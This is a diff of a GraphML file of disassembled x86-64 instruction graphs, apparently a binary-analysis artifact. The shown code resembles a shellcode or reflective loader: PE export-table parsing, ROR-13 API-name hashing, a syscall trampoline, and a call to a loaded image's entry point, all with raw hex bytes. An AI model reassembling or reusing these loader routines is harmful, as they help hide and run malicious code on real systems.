           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b6dd0</data>
           <data key="instruction.source">mov r13, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1539:instruction.0x154d">
-          <data key="address">0x154d</data>
+        <node id="block.0x1527:instruction.0x153b">
+          <data key="address">0x153b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901c5</data>
           <data key="instruction.source">add r13, rax</data>
         </node>
-        <node id="block.0x1539:instruction.0x1550">
-          <data key="address">0x1550</data>
+        <node id="block.0x1527:instruction.0x153e">
+          <data key="address">0x153e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec28</data>
           <data key="instruction.source">sub rsp, 0x28</data>
         </node>
-        <node id="block.0x1539:instruction.0x1554">
-          <data key="address">0x1554</data>
+        <node id="block.0x1527:instruction.0x1542">
+          <data key="address">0x1542</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48c7c1ffffffff</data>
           <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
         </node>
-        <node id="block.0x1539:instruction.0x155b">
-          <data key="address">0x155b</data>
+        <node id="block.0x1527:instruction.0x1549">
+          <data key="address">0x1549</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4831d2</data>
           <data key="instruction.source">xor rdx, rdx</data>
         </node>
-        <node id="block.0x1539:instruction.0x155e">
-          <data key="address">0x155e</data>
+        <node id="block.0x1527:instruction.0x154c">
+          <data key="address">0x154c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4531c0</data>
           <data key="instruction.source">xor r8d, r8d</data>
         </node>
-        <node id="block.0x1539:instruction.0x1561">
-          <data key="address">0x1561</data>
+        <node id="block.0x1527:instruction.0x154f">
+          <data key="address">0x154f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff55e0</data>
           <data key="instruction.source">call qword ptr [rbp - 0x20]</data>
         </node>
-        <edge source="block.0x1539:instruction.0x1539" target="block.0x1539:instruction.0x153d"/>
-        <edge source="block.0x1539:instruction.0x1539" target="block.0x1539:instruction.0x1540"/>
-        <edge source="block.0x1539:instruction.0x1539" target="block.0x1539:instruction.0x1554"/>
-        <edge source="block.0x1539:instruction.0x153d" target="block.0x1539:instruction.0x1540"/>
-        <edge source="block.0x1539:instruction.0x153d" target="block.0x1539:instruction.0x1544"/>
-        <edge source="block.0x1539:instruction.0x153d" target="block.0x1539:instruction.0x1554"/>
-        <edge source="block.0x1539:instruction.0x1540" target="block.0x1539:instruction.0x1544"/>
-        <edge source="block.0x1539:instruction.0x1540" target="block.0x1539:instruction.0x1554"/>
-        <edge source="block.0x1539:instruction.0x1544" target="block.0x1539:instruction.0x154d"/>
-        <edge source="block.0x1539:instruction.0x1549" target="block.0x1539:instruction.0x154d"/>
-        <edge source="block.0x1539:instruction.0x154d" target="block.0x1539:instruction.0x1550"/>
-        <edge source="block.0x1539:instruction.0x1550" target="block.0x1539:instruction.0x155b"/>
-        <edge source="block.0x1539:instruction.0x1550" target="block.0x1539:instruction.0x1561"/>
-        <edge source="block.0x1539:instruction.0x1554" target="block.0x1539:instruction.0x1561"/>
-        <edge source="block.0x1539:instruction.0x155b" target="block.0x1539:instruction.0x155e"/>
-        <edge source="block.0x1539:instruction.0x155e" target="block.0x1539:instruction.0x1561"/>
+        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x152b"/>
+        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x152e"/>
+        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x1542"/>
+        <edge source="block.0x1527:instruction.0x1527" target="block.0x1527:instruction.0x154f"/>
+        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x152e"/>
+        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x1532"/>
+        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x1542"/>
+        <edge source="block.0x1527:instruction.0x152b" target="block.0x1527:instruction.0x154f"/>
+        <edge source="block.0x1527:instruction.0x152e" target="block.0x1527:instruction.0x1532"/>
+        <edge source="block.0x1527:instruction.0x152e" target="block.0x1527:instruction.0x1542"/>
+        <edge source="block.0x1527:instruction.0x1532" target="block.0x1527:instruction.0x153b"/>
+        <edge source="block.0x1527:instruction.0x1532" target="block.0x1527:instruction.0x154f"/>
+        <edge source="block.0x1527:instruction.0x1537" target="block.0x1527:instruction.0x153b"/>
+        <edge source="block.0x1527:instruction.0x1537" target="block.0x1527:instruction.0x154f"/>
+        <edge source="block.0x1527:instruction.0x153b" target="block.0x1527:instruction.0x153e"/>
+        <edge source="block.0x1527:instruction.0x153e" target="block.0x1527:instruction.0x1549"/>
+        <edge source="block.0x1527:instruction.0x153e" target="block.0x1527:instruction.0x154f"/>
+        <edge source="block.0x1527:instruction.0x1542" target="block.0x1527:instruction.0x154f"/>
+        <edge source="block.0x1527:instruction.0x1549" target="block.0x1527:instruction.0x154c"/>
+        <edge source="block.0x1527:instruction.0x154c" target="block.0x1527:instruction.0x154f"/>
       </graph>
     </node>
-    <node id="block.0x1564">
-      <data key="address">0x1564</data>
+    <node id="block.0x1552">
+      <data key="address">0x1552</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1564</data>
+        <data key="address">0x1552</data>
         <data key="type">instructions</data>
-        <node id="block.0x1564:instruction.0x1564">
-          <data key="address">0x1564</data>
+        <node id="block.0x1552:instruction.0x1552">
+          <data key="address">0x1552</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c428</data>
           <data key="instruction.source">add rsp, 0x28</data>
         </node>
-        <node id="block.0x1564:instruction.0x1568">
-          <data key="address">0x1568</data>
+        <node id="block.0x1552:instruction.0x1556">
+          <data key="address">0x1556</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec28</data>
           <data key="instruction.source">sub rsp, 0x28</data>
         </node>
-        <node id="block.0x1564:instruction.0x156c">
-          <data key="address">0x156c</data>
+        <node id="block.0x1552:instruction.0x155a">
+          <data key="address">0x155a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1564:instruction.0x1570">
-          <data key="address">0x1570</data>
+        <node id="block.0x1552:instruction.0x155e">
+          <data key="address">0x155e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ba01000000</data>
           <data key="instruction.source">mov edx, 1</data>
         </node>
-        <node id="block.0x1564:instruction.0x1575">
-          <data key="address">0x1575</data>
+        <node id="block.0x1552:instruction.0x1563">
+          <data key="address">0x1563</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4531c0</data>
           <data key="instruction.source">xor r8d, r8d</data>
         </node>
-        <node id="block.0x1564:instruction.0x1578">
-          <data key="address">0x1578</data>
+        <node id="block.0x1552:instruction.0x1566">
+          <data key="address">0x1566</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41ffd5</data>
           <data key="instruction.source">call r13</data>
         </node>
-        <edge source="block.0x1564:instruction.0x1564" target="block.0x1564:instruction.0x1568"/>
-        <edge source="block.0x1564:instruction.0x1568" target="block.0x1564:instruction.0x1575"/>
-        <edge source="block.0x1564:instruction.0x1568" target="block.0x1564:instruction.0x1578"/>
-        <edge source="block.0x1564:instruction.0x156c" target="block.0x1564:instruction.0x1578"/>
-        <edge source="block.0x1564:instruction.0x1570" target="block.0x1564:instruction.0x1578"/>
-        <edge source="block.0x1564:instruction.0x1575" target="block.0x1564:instruction.0x1578"/>
+        <edge source="block.0x1552:instruction.0x1552" target="block.0x1552:instruction.0x1556"/>
+        <edge source="block.0x1552:instruction.0x1556" target="block.0x1552:instruction.0x1563"/>
+        <edge source="block.0x1552:instruction.0x1556" target="block.0x1552:instruction.0x1566"/>
+        <edge source="block.0x1552:instruction.0x155a" target="block.0x1552:instruction.0x1566"/>
+        <edge source="block.0x1552:instruction.0x155e" target="block.0x1552:instruction.0x1566"/>
+        <edge source="block.0x1552:instruction.0x1563" target="block.0x1552:instruction.0x1566"/>
       </graph>
     </node>
-    <node id="block.0x157b">
-      <data key="address">0x157b</data>
+    <node id="block.0x1569">
+      <data key="address">0x1569</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x157b</data>
+        <data key="address">0x1569</data>
         <data key="type">instructions</data>
-        <node id="block.0x157b:instruction.0x157b">
-          <data key="address">0x157b</data>
+        <node id="block.0x1569:instruction.0x1569">
+          <data key="address">0x1569</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c428</data>
           <data key="instruction.source">add rsp, 0x28</data>
         </node>
-        <node id="block.0x157b:instruction.0x157f">
-          <data key="address">0x157f</data>
+        <node id="block.0x1569:instruction.0x156d">
+          <data key="address">0x156d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c89e8</data>
           <data key="instruction.source">mov rax, r13</data>
         </node>
-        <node id="block.0x157b:instruction.0x1582">
-          <data key="address">0x1582</data>
+        <node id="block.0x1569:instruction.0x1570">
+          <data key="address">0x1570</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415f</data>
           <data key="instruction.source">pop r15</data>
         </node>
-        <node id="block.0x157b:instruction.0x1584">
-          <data key="address">0x1584</data>
+        <node id="block.0x1569:instruction.0x1572">
+          <data key="address">0x1572</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415e</data>
           <data key="instruction.source">pop r14</data>
         </node>
-        <node id="block.0x157b:instruction.0x1586">
-          <data key="address">0x1586</data>
+        <node id="block.0x1569:instruction.0x1574">
+          <data key="address">0x1574</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415d</data>
           <data key="instruction.source">pop r13</data>
         </node>
-        <node id="block.0x157b:instruction.0x1588">
-          <data key="address">0x1588</data>
+        <node id="block.0x1569:instruction.0x1576">
+          <data key="address">0x1576</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">415c</data>
           <data key="instruction.source">pop r12</data>
         </node>
-        <node id="block.0x157b:instruction.0x158a">
-          <data key="address">0x158a</data>
+        <node id="block.0x1569:instruction.0x1578">
+          <data key="address">0x1578</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5f</data>
           <data key="instruction.source">pop rdi</data>
         </node>
-        <node id="block.0x157b:instruction.0x158b">
-          <data key="address">0x158b</data>
+        <node id="block.0x1569:instruction.0x1579">
+          <data key="address">0x1579</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5e</data>
           <data key="instruction.source">pop rsi</data>
         </node>
-        <node id="block.0x157b:instruction.0x158c">
-          <data key="address">0x158c</data>
+        <node id="block.0x1569:instruction.0x157a">
+          <data key="address">0x157a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5b</data>
           <data key="instruction.source">pop rbx</data>
         </node>
-        <node id="block.0x157b:instruction.0x158d">
-          <data key="address">0x158d</data>
+        <node id="block.0x1569:instruction.0x157b">
+          <data key="address">0x157b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889ec</data>
           <data key="instruction.source">mov rsp, rbp</data>
         </node>
-        <node id="block.0x157b:instruction.0x1590">
-          <data key="address">0x1590</data>
+        <node id="block.0x1569:instruction.0x157e">
+          <data key="address">0x157e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5d</data>
           <data key="instruction.source">pop rbp</data>
         </node>
-        <node id="block.0x157b:instruction.0x1591">
-          <data key="address">0x1591</data>
+        <node id="block.0x1569:instruction.0x157f">
+          <data key="address">0x157f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
-        <edge source="block.0x157b:instruction.0x157b" target="block.0x157b:instruction.0x1582"/>
-        <edge source="block.0x157b:instruction.0x157f" target="block.0x157b:instruction.0x1586"/>
-        <edge source="block.0x157b:instruction.0x1582" target="block.0x157b:instruction.0x1584"/>
-        <edge source="block.0x157b:instruction.0x1584" target="block.0x157b:instruction.0x1586"/>
-        <edge source="block.0x157b:instruction.0x1586" target="block.0x157b:instruction.0x1588"/>
-        <edge source="block.0x157b:instruction.0x1588" target="block.0x157b:instruction.0x158a"/>
-        <edge source="block.0x157b:instruction.0x158a" target="block.0x157b:instruction.0x158b"/>
-        <edge source="block.0x157b:instruction.0x158b" target="block.0x157b:instruction.0x158c"/>
-        <edge source="block.0x157b:instruction.0x158c" target="block.0x157b:instruction.0x158d"/>
-        <edge source="block.0x157b:instruction.0x158d" target="block.0x157b:instruction.0x1590"/>
-        <edge source="block.0x157b:instruction.0x1590" target="block.0x157b:instruction.0x1591"/>
+        <edge source="block.0x1569:instruction.0x1569" target="block.0x1569:instruction.0x1570"/>
+        <edge source="block.0x1569:instruction.0x156d" target="block.0x1569:instruction.0x1574"/>
+        <edge source="block.0x1569:instruction.0x1570" target="block.0x1569:instruction.0x1572"/>
+        <edge source="block.0x1569:instruction.0x1572" target="block.0x1569:instruction.0x1574"/>
+        <edge source="block.0x1569:instruction.0x1574" target="block.0x1569:instruction.0x1576"/>
+        <edge source="block.0x1569:instruction.0x1576" target="block.0x1569:instruction.0x1578"/>
+        <edge source="block.0x1569:instruction.0x1578" target="block.0x1569:instruction.0x1579"/>
+        <edge source="block.0x1569:instruction.0x1579" target="block.0x1569:instruction.0x157a"/>
+        <edge source="block.0x1569:instruction.0x157a" target="block.0x1569:instruction.0x157b"/>
+        <edge source="block.0x1569:instruction.0x157b" target="block.0x1569:instruction.0x157e"/>
+        <edge source="block.0x1569:instruction.0x157e" target="block.0x1569:instruction.0x157f"/>
       </graph>
     </node>
-    <node id="block.0x1592">
-      <data key="address">0x1592</data>
+    <node id="block.0x1580">
+      <data key="address">0x1580</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1592</data>
+        <data key="address">0x1580</data>
         <data key="type">instructions</data>
-        <node id="block.0x1592:instruction.0x1592">
-          <data key="address">0x1592</data>
+        <node id="block.0x1580:instruction.0x1580">
+          <data key="address">0x1580</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4204</data>
+          <data key="instruction.source">mov eax, dword ptr [r10 + 4]</data>
+        </node>
+        <node id="block.0x1580:instruction.0x1584">
+          <data key="address">0x1584</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d8d5a08</data>
+          <data key="instruction.source">lea r11, [r10 + 8]</data>
+        </node>
+        <node id="block.0x1580:instruction.0x1588">
+          <data key="address">0x1588</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4989ca</data>
+          <data key="instruction.source">mov r10, rcx</data>
+        </node>
+        <node id="block.0x1580:instruction.0x158b">
+          <data key="address">0x158b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41ffe3</data>
+          <data key="instruction.source">jmp r11</data>
+        </node>
+        <edge source="block.0x1580:instruction.0x1580" target="block.0x1580:instruction.0x1588"/>
+        <edge source="block.0x1580:instruction.0x1584" target="block.0x1580:instruction.0x1588"/>
+        <edge source="block.0x1580:instruction.0x1584" target="block.0x1580:instruction.0x158b"/>
+        <edge source="block.0x1580:instruction.0x1588" target="block.0x1580:instruction.0x158b"/>
+      </graph>
+    </node>
+    <node id="block.0x158e">
+      <data key="address">0x158e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x158e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x158e:instruction.0x158e">
+          <data key="address">0x158e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b453c</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0x3c]</data>
         </node>
-        <node id="block.0x1592:instruction.0x1596">
-          <data key="address">0x1596</data>
+        <node id="block.0x158e:instruction.0x1592">
+          <data key="address">0x1592</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d5c0500</data>
           <data key="instruction.source">lea rbx, [r13 + rax]</data>
         </node>
-        <node id="block.0x1592:instruction.0x159b">
-          <data key="address">0x159b</data>
+        <node id="block.0x158e:instruction.0x1597">
+          <data key="address">0x1597</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b8388000000</data>
           <data key="instruction.source">mov eax, dword ptr [rbx + 0x88]</data>
         </node>
-        <node id="block.0x1592:instruction.0x15a1">
-          <data key="address">0x15a1</data>
+        <node id="block.0x158e:instruction.0x159d">
+          <data key="address">0x159d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d4c0500</data>
           <data key="instruction.source">lea rcx, [r13 + rax]</data>
         </node>
-        <node id="block.0x1592:instruction.0x15a6">
-          <data key="address">0x15a6</data>
+        <node id="block.0x158e:instruction.0x15a2">
+          <data key="address">0x15a2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894dc0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x40], rcx</data>
         </node>
-        <node id="block.0x1592:instruction.0x15aa">
-          <data key="address">0x15aa</data>
+        <node id="block.0x158e:instruction.0x15a6">
+          <data key="address">0x15a6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4118</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x18]</data>
         </node>
-        <node id="block.0x1592:instruction.0x15ad">
-          <data key="address">0x15ad</data>
+        <node id="block.0x158e:instruction.0x15a9">
+          <data key="address">0x15a9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894590</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x70], rax</data>
         </node>
-        <node id="block.0x1592:instruction.0x15b1">
-          <data key="address">0x15b1</data>
+        <node id="block.0x158e:instruction.0x15ad">
+          <data key="address">0x15ad</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4120</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x20]</data>
         </node>
-        <node id="block.0x1592:instruction.0x15b4">
-          <data key="address">0x15b4</data>
+        <node id="block.0x158e:instruction.0x15b0">
+          <data key="address">0x15b0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d440500</data>
           <data key="instruction.source">lea rax, [r13 + rax]</data>
         </node>
-        <node id="block.0x1592:instruction.0x15b9">
-          <data key="address">0x15b9</data>
+        <node id="block.0x158e:instruction.0x15b5">
+          <data key="address">0x15b5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488945b8</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x48], rax</data>
         </node>
-        <node id="block.0x1592:instruction.0x15bd">
-          <data key="address">0x15bd</data>
+        <node id="block.0x158e:instruction.0x15b9">
+          <data key="address">0x15b9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4124</data>
           <data key="instruction.source">mov eax, dword ptr [rcx + 0x24]</data>
         </node>
-        <node id="block.0x1592:instruction.0x15c0">
-          <data key="address">0x15c0</data>
+        <node id="block.0x158e:instruction.0x15bc">
+          <data key="address">0x15bc</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">498d440500</data>
           <data key="instruction.source">lea rax, [r13 + rax]</data>
         </node>
-        <node id="block.0x1592:instruction.0x15c5">
-          <data key="address">0x15c5</data>
+        <node id="block.0x158e:instruction.0x15c1">
+          <data key="address">0x15c1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488945b0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x50], rax</data>
         </node>
-        <node id="block.0x1592:instruction.0x15c9">
-          <data key="address">0x15c9</data>
+        <node id="block.0x158e:instruction.0x15c5">
+          <data key="address">0x15c5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
-        <edge source="block.0x1592:instruction.0x1592" target="block.0x1592:instruction.0x1596"/>
-        <edge source="block.0x1592:instruction.0x1592" target="block.0x1592:instruction.0x159b"/>
-        <edge source="block.0x1592:instruction.0x1596" target="block.0x1592:instruction.0x159b"/>
-        <edge source="block.0x1592:instruction.0x159b" target="block.0x1592:instruction.0x15a1"/>
-        <edge source="block.0x1592:instruction.0x159b" target="block.0x1592:instruction.0x15aa"/>
-        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15a6"/>
-        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15aa"/>
-        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15b1"/>
-        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15bd"/>
-        <edge source="block.0x1592:instruction.0x15a6" target="block.0x1592:instruction.0x15c9"/>
-        <edge source="block.0x1592:instruction.0x15aa" target="block.0x1592:instruction.0x15ad"/>
-        <edge source="block.0x1592:instruction.0x15aa" target="block.0x1592:instruction.0x15b1"/>
-        <edge source="block.0x1592:instruction.0x15ad" target="block.0x1592:instruction.0x15b1"/>
-        <edge source="block.0x1592:instruction.0x15b1" target="block.0x1592:instruction.0x15b4"/>
-        <edge source="block.0x1592:instruction.0x15b4" target="block.0x1592:instruction.0x15b9"/>
-        <edge source="block.0x1592:instruction.0x15b4" target="block.0x1592:instruction.0x15bd"/>
-        <edge source="block.0x1592:instruction.0x15b9" target="block.0x1592:instruction.0x15bd"/>
-        <edge source="block.0x1592:instruction.0x15bd" target="block.0x1592:instruction.0x15c0"/>
-        <edge source="block.0x1592:instruction.0x15c0" target="block.0x1592:instruction.0x15c5"/>
-        <edge source="block.0x1592:instruction.0x15c5" target="block.0x1592:instruction.0x15c9"/>
+        <edge source="block.0x158e:instruction.0x158e" target="block.0x158e:instruction.0x1592"/>
+        <edge source="block.0x158e:instruction.0x158e" target="block.0x158e:instruction.0x1597"/>
+        <edge source="block.0x158e:instruction.0x158e" target="block.0x158e:instruction.0x15a2"/>
+        <edge source="block.0x158e:instruction.0x1592" target="block.0x158e:instruction.0x1597"/>
+        <edge source="block.0x158e:instruction.0x1597" target="block.0x158e:instruction.0x159d"/>
+        <edge source="block.0x158e:instruction.0x1597" target="block.0x158e:instruction.0x15a2"/>
+        <edge source="block.0x158e:instruction.0x1597" target="block.0x158e:instruction.0x15a6"/>
+        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15a2"/>
+        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15a6"/>
+        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15ad"/>
+        <edge source="block.0x158e:instruction.0x159d" target="block.0x158e:instruction.0x15b9"/>
+        <edge source="block.0x158e:instruction.0x15a2" target="block.0x158e:instruction.0x15a6"/>
+        <edge source="block.0x158e:instruction.0x15a6" target="block.0x158e:instruction.0x15a9"/>
+        <edge source="block.0x158e:instruction.0x15a6" target="block.0x158e:instruction.0x15ad"/>
+        <edge source="block.0x158e:instruction.0x15a9" target="block.0x158e:instruction.0x15ad"/>
+        <edge source="block.0x158e:instruction.0x15ad" target="block.0x158e:instruction.0x15b0"/>
+        <edge source="block.0x158e:instruction.0x15ad" target="block.0x158e:instruction.0x15b5"/>
+        <edge source="block.0x158e:instruction.0x15b0" target="block.0x158e:instruction.0x15b5"/>
+        <edge source="block.0x158e:instruction.0x15b0" target="block.0x158e:instruction.0x15b9"/>
+        <edge source="block.0x158e:instruction.0x15b5" target="block.0x158e:instruction.0x15b9"/>
+        <edge source="block.0x158e:instruction.0x15b9" target="block.0x158e:instruction.0x15bc"/>
+        <edge source="block.0x158e:instruction.0x15b9" target="block.0x158e:instruction.0x15c1"/>
+        <edge source="block.0x158e:instruction.0x15bc" target="block.0x158e:instruction.0x15c1"/>
+        <edge source="block.0x158e:instruction.0x15c1" target="block.0x158e:instruction.0x15c5"/>
       </graph>
     </node>
-    <node id="block.0x15ca">
-      <data key="address">0x15ca</data>
+    <node id="block.0x15c6">
+      <data key="address">0x15c6</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15ca</data>
+        <data key="address">0x15c6</data>
         <data key="type">instructions</data>
-        <node id="block.0x15ca:instruction.0x15ca">
-          <data key="address">0x15ca</data>
+        <node id="block.0x15c6:instruction.0x15c6">
+          <data key="address">0x15c6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">31c0</data>
           <data key="instruction.source">xor eax, eax</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x15cc">
-      <data key="address">0x15cc</data>
+    <node id="block.0x15c8">
+      <data key="address">0x15c8</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15cc</data>
+        <data key="address">0x15c8</data>
         <data key="type">instructions</data>
-        <node id="block.0x15cc:instruction.0x15cc">
-          <data key="address">0x15cc</data>
+        <node id="block.0x15c8:instruction.0x15c8">
+          <data key="address">0x15c8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0fb619</data>
           <data key="instruction.source">movzx ebx, byte ptr [rcx]</data>
         </node>
-        <node id="block.0x15cc:instruction.0x15cf">
-          <data key="address">0x15cf</data>
+        <node id="block.0x15c8:instruction.0x15cb">
+          <data key="address">0x15cb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85db</data>
           <data key="instruction.source">test ebx, ebx</data>
         </node>
-        <node id="block.0x15cc:instruction.0x15d1">
-          <data key="address">0x15d1</data>
+        <node id="block.0x15c8:instruction.0x15cd">
+          <data key="address">0x15cd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">740a</data>
-          <data key="instruction.source">je 0x15dd</data>
+          <data key="instruction.source">je 0x15d9</data>
         </node>
-        <edge source="block.0x15cc:instruction.0x15cc" target="block.0x15cc:instruction.0x15cf"/>
-        <edge source="block.0x15cc:instruction.0x15cf" target="block.0x15cc:instruction.0x15d1"/>
+        <edge source="block.0x15c8:instruction.0x15c8" target="block.0x15c8:instruction.0x15cb"/>
+        <edge source="block.0x15c8:instruction.0x15cb" target="block.0x15c8:instruction.0x15cd"/>
       </graph>
     </node>
-    <node id="block.0x15d3">
-      <data key="address">0x15d3</data>
+    <node id="block.0x15cf">
+      <data key="address">0x15cf</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15d3</data>
+        <data key="address">0x15cf</data>
         <data key="type">instructions</data>
-        <node id="block.0x15d3:instruction.0x15d3">
-          <data key="address">0x15d3</data>
+        <node id="block.0x15cf:instruction.0x15cf">
+          <data key="address">0x15cf</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1c80d</data>
           <data key="instruction.source">ror eax, 0xd</data>
         </node>
-        <node id="block.0x15d3:instruction.0x15d6">
-          <data key="address">0x15d6</data>
+        <node id="block.0x15cf:instruction.0x15d2">
+          <data key="address">0x15d2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d8</data>
           <data key="instruction.source">add eax, ebx</data>
         </node>
-        <node id="block.0x15d3:instruction.0x15d8">
-          <data key="address">0x15d8</data>
+        <node id="block.0x15cf:instruction.0x15d4">
+          <data key="address">0x15d4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc1</data>
           <data key="instruction.source">inc rcx</data>
         </node>
-        <node id="block.0x15d3:instruction.0x15db">
-          <data key="address">0x15db</data>
+        <node id="block.0x15cf:instruction.0x15d7">
+          <data key="address">0x15d7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ebef</data>
-          <data key="instruction.source">jmp 0x15cc</data>
+          <data key="instruction.source">jmp 0x15c8</data>
         </node>
-        <edge source="block.0x15d3:instruction.0x15d3" target="block.0x15d3:instruction.0x15d6"/>
-        <edge source="block.0x15d3:instruction.0x15d3" target="block.0x15d3:instruction.0x15d8"/>
-        <edge source="block.0x15d3:instruction.0x15d6" target="block.0x15d3:instruction.0x15d8"/>
-        <edge source="block.0x15d3:instruction.0x15d8" target="block.0x15d3:instruction.0x15db"/>
+        <edge source="block.0x15cf:instruction.0x15cf" target="block.0x15cf:instruction.0x15d2"/>
+        <edge source="block.0x15cf:instruction.0x15cf" target="block.0x15cf:instruction.0x15d4"/>
+        <edge source="block.0x15cf:instruction.0x15d2" target="block.0x15cf:instruction.0x15d4"/>
+        <edge source="block.0x15cf:instruction.0x15d4" target="block.0x15cf:instruction.0x15d7"/>
       </graph>
     </node>
-    <node id="block.0x15dd">
-      <data key="address">0x15dd</data>
+    <node id="block.0x15d9">
+      <data key="address">0x15d9</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15dd</data>
+        <data key="address">0x15d9</data>
         <data key="type">instructions</data>
-        <node id="block.0x15dd:instruction.0x15dd">
-          <data key="address">0x15dd</data>
+        <node id="block.0x15d9:instruction.0x15d9">
+          <data key="address">0x15d9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x15de">
-      <data key="address">0x15de</data>
+    <node id="block.0x15da">
+      <data key="address">0x15da</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x15de</data>
+        <data key="address">0x15da</data>
         <data key="type">instructions</data>
-        <node id="block.0x15de:instruction.0x15de">
-          <data key="address">0x15de</data>
+        <node id="block.0x15da:instruction.0x15da">
+          <data key="address">0x15da</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">418b4204</data>
-          <data key="instruction.source">mov eax, dword ptr [r10 + 4]</data>
+          <data key="instruction.hex">e8e7feffff</data>
+          <data key="instruction.source">call 0x14c6</data>
         </node>
-        <node id="block.0x15de:instruction.0x15e2">
-          <data key="address">0x15e2</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">4d8d5a08</data>
-          <data key="instruction.source">lea r11, [r10 + 8]</data>
-        </node>
-        <node id="block.0x15de:instruction.0x15e6">
-          <data key="address">0x15e6</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">4989ca</data>
-          <data key="instruction.source">mov r10, rcx</data>
-        </node>
-        <node id="block.0x15de:instruction.0x15e9">
-          <data key="address">0x15e9</data>
-          <data key="type">instruction</data>
-          <data key="instruction.hex">41ffe3</data>
